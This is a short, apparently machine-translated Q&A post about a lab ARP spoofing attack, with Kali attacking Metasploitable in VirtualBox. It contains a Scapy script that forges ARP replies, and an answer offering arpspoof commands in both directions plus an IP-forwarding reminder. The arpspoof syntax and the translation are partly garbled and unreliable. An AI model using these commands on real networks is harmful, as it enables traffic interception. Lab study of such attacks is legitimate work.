问题描述
我正在尝试用船尾进行仿冒攻击。 我在Linux Min OS中使用virtualBox,我的攻击机是KaliLinux,目标是Metasploitable。 这是我的船长脚本:
targetIP="192.168.56.103"
gatewayIP="192.168.56.1"
myIP="192.168.56.101"
targetMAC="08:00:27:57:58:54"
myMAC="08:00:27:7d:94:1e"
a = ARP()
a.psrc = gatewayIP
a.pdst = targetIP
a.hwdst = targetMAC
a.hwsrc = myMAC
a.op = 2
send(a)
我发送了a后,我希望目标的arp表会
gatewayIP => myMAC
但是我得到了
myIp => myMAC
我在做什么错了?
解决方法
如果您想在Kalilinux中查看arp表;您可以在提示时编写arp --a。而且,如果您想攻击,也可以使用; arpspoof -i eth0 --targetIP NetworkDeviceIP arpspoof -i eth0 --NetworkDeviceIP targetIP
但不要忘记使IP向前发展。
我希望它会起作用。